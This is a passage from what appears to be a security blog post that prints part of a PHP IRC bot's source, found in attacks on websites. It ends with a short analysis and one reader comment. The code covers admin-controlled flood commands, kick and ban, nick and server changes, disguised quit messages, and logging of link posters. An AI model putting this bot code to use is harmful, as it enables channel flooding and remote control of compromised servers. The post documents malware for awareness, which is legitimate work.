fputs($fp, 'PRIVMSG '.$com[4].' :TSUNAMI '.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'__________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'___________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :FLOOD '.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
if (ereg("", $com[4])) {
fputs($fp, 'PART '.$com[4].' :Complete' . CRL);
fputs($fp, 'NICK '.$nick . CRL);
} else {
fputs($fp, 'NICK '.$nick . CRL);
}
}
elseif ($com[3]==':`cycle' && $chan && $auth["$dNick"]["status"]!="user") {
$msg = strstr($data,":`cycle");
if (ereg("", $com[4])) {
$partchan = $com[4];
$msg = str_replace(":`cycle $com[4]","",$msg);
} else {
$partchan = $chan;
$msg = str_replace(":`cycle","",$msg);
}
if (strlen($msg)<3) {
$msg = '';
}
fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);
fputs($fp, 'JOIN '.$partchan . CRL);
}
elseif ($com[3]==':`part' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`part");
if (ereg("#", $com[4])) {
$partchan = $com[4];
$msg = strreplace(":`part $com[4]","",$msg);
} else {
$partchan = $chan;
$msg = str_replace(":`part","",$msg);
}
if (strlen($msg)<3) {
$msg = '';
}
fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);
$remchan = strtolower($partchan);
if (inarray($remchan, $channel)) {
$channels = str_replace("$remchan ","",$channels);
unset($channel);
$channel = explode(" ", $channels);
}
foreach ($channel as $v) {
fputs($fp, 'JOIN '.$v . CRL);
}
}
elseif ($com[3]==':`join' && $com[4] && $auth["$dNick"]["status"]=="Admin") {
if (!ereg("",$com[4])) { $com[4]="".$com[4]; }
$addchan = strtolower($com[4]);
if (!in_array($addchan, $channel)) {
$channel[]=$addchan;
$channels.="$addchan ";
}
foreach ($channel as $v) {
sleep(rand(1,6));
fputs($fp, 'JOIN '.$v . CRL);
}
}
elseif ($com[3]==':`botnick' && $com[4] && !$chan && $auth["$dNick"]["status"]=="Admin") {
$nick = $com[4];
$identify = $com[5];
fputs($fp, 'NICK '.$nick . CRL);
fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL);
}
elseif ($com[3]==':`k' && $com[4] && $chan) {
$msg = strstr($data,":`k");
$msg = str_replace(":`k $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
}
elseif ($com[3]==':`kb' && $com[4] && $chan) {
$msg = strstr($data,":`kb");
$msg = str_replace(":`kb $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
fputs($fp, 'MODE '.$chan.' +b '.$com[4] . CRL);
}
elseif ($com[3]==':`ganti') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
if (substr($dCommand,0,3)=='433') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
}
elseif ($com[3]==':`op' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' +ooo '.$opnick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`deop' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' -o+v-oo '.$opnick.' '.$opnick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`v' && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' +vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`dv' && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' -vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`awaymsg' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`awaymsg");
$msg = str_replace(":`awaymsg","",$msg);
if (strlen($msg)<3) {
$raway="on";
fputs($fp,'AWAY : ' . 'AWAY' . CRL);
} else {
$raway="off";
fputs($fp,'AWAY : ' . $msg . CRL);
}
}
elseif ($com[3]==':`mode' && $com[4] && $chan) {
fputs($fp, 'MODE '.$chan.' :'.$com[4].' '.$com[5] . CRL);
}
elseif ($com[3]==':`nickmode' && $com[4]) {
$nickmode = $com[4];
fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL);
}
elseif ($com[3]==':`chanlist') {
fputs($fp, 'NOTICE '.$dNick.' :Channel List: '.$channels . CRL);
}
elseif ($com[3]==':`userlist') {
$userlist="";
foreach ($auth as $user) {
if ($user["pass"]) { $pass="-pass ok"; }
else { $pass="-no pass"; }
$userlist .= $user["name"].'('.$user["status"].$pass.') ';
}
fputs($fp, 'NOTICE '.$dNick.' :User List: '.$userlist . CRL);
}
elseif ($com[3]==':`quit' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`quit");
$msg = str_replace(":`quit","",$msg);
if (strlen($msg)>3) {
$msg = str_replace(" ","",$msg);
}
$quit1 = array("ngantor","nguantuk","sama","brb","byeall","s33_you","excess_flood","pingtimeout","hehe","bye","mandi","makan","muuah","quit","conection_reset_bay_peer","banned","part","leaving","ada_deh","call_me","wew","toronto.hub.dal.net_brodway.dal.net","no_komen","restart");
$quitmsg = $quit1[rand(0,count($quit1) - 1)];
fputs($fp, 'QUIT ' . $quitmsg . CRL);
$keluar = 1;
exit;
}
elseif ($com[3]==':`vhost' && $auth["$dNick"]["status"]=="Admin") {
if ($com[4]) { $localhost = $com[4]; }
else { $localhost = 'localhost'; }
$keluar = 0;
fputs($fp, 'QUIT ' . CRL);
}
elseif ($com[3]==':`jump' && $auth["$dNick"]["status"]=="Admin") {
if (!eregi(".dal.net",$com[4])) {
$remotehost = "irc.dal.net";
} else { $remotehost = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT changging_server' . CRL);
}
elseif ($com[3]==':`ident' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) {
$username = $username;
} else { $username = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT ganti_ident' . CRL);
}
elseif ($com[3]==':`fullname' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) {
$realname = "--";
} else { $realname = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT ganti_fullname' . CRL);
}
elseif ($com[3]==':`topic' && $com[4] && $chan) {
$msg = strstr($data,":`topic");
$msg = str_replace(":`topic ","",$msg);
fputs($fp, 'TOPIC '.$chan.' :'.$msg . CRL);
}
elseif ($com[3]==':!help' && !$chan) {
fputs($fp,'PRIVMSG '.$dNick.' :Secret Help' . CRL);
}
} else { fputs($fp,'NOTICE '.$dNick.' lease Auth First! Type: auth <your pass> To Authorized '. CRL); }
}
}
elseif (!$auth["$dNick"] && !eregi("auth",$iText)) {
if (eregi("www.",$iText) || eregi("http:",$iText) || eregi("join ",$iText)) {
if (!ereg("",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '. $Admin .' :4inviter: ' . $dFrom . '2:' .$iText. CRL);
}
$inv = strstr($dFrom,'@');
foreach ($auth as $user) {
if ($user["status"]=="user") {
fputs($fp, 'NOTICE '.$user["name"].' :KB '.$chan.' '.$dNick.' '.$inv.'' . CRL);
}
}
}
}
elseif (!ereg("#",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '.$Admin.' :6' . $dFrom . '12:' .$iText. CRL);
}
}
}
}
}
elseif (substr($data,0,4) == 'PING') {
fputs($fp,'PONG ' . substr($data,5) . CRL);
$smile = $querym[rand(0,count($querym) - 1)];
$kata1 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
$kata2 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
fputs($fp,'PRIVMSG #whatz :' . $kata1 . ' ' . $kata2 . $smile . CRL);
}
}
}
fclose ($fp);
} while ($keluar==0);
}
working($nick);
?>
Yes, that’s right Nancy, it’s an IRC bot coded in PHP! Quite nice. It appears to give a conduit to a bot master, probably used to upload and execute new scripts. Fortunately, most sites aren’t vulnerable to this relatively old attack. It is interesting, though, that the attacks are clearly aimed at certain types of software that are apparently perceived as vulnerable by the miscreant that is spreading this gunk.
One comment
Why do think this is “quite nice”?
Leave a Comment:
You must be logged in to post a comment.
Categories
Tags
-
